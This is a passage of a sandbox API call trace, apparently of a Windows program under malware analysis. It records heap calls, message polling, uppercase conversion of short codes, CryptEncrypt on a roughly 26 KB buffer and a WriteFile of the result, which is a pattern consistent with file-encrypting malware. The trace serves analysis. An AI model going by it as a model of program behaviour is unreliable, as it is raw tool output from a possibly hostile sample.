dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.185] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0215.185] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0215.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0215.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.186] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74550 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.186] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0215.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0215.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0215.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0215.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0215.187] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0215.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7b8 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.187] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.188] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.188] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0215.188] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9d8d8 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0215.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0215.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0215.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0215.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0215.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0215.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.191] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x67d6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x67d8) returned 1 [0215.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.191] CharLowerBuffW (in: lpsz="byte[26584]", cchLength=0xb | out: lpsz="byte[26584]") returned 0xb [0215.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.193] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.193] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.193] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.193] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.193] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.193] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.193] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9d8d8*, pdwDataLen=0x8cef60*=0x67d6, dwBufLen=0x67d8 | out: pbData=0x2a9d8d8*, pdwDataLen=0x8cef60*=0x67d8) returned 1 [0215.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.194] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.194] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.194] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.194] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.195] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.195] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.195] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.195] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.213] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.213] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.213] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.213] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.213] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.213] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.213] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.213] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.213] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.213] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.213] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.213] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.216] WriteFile (in: hFile=0x510, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x67d8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x67d8, lpOverlapped=0x0) returned 1 [0215.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.218] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0215.218] PeekMessageW (in: 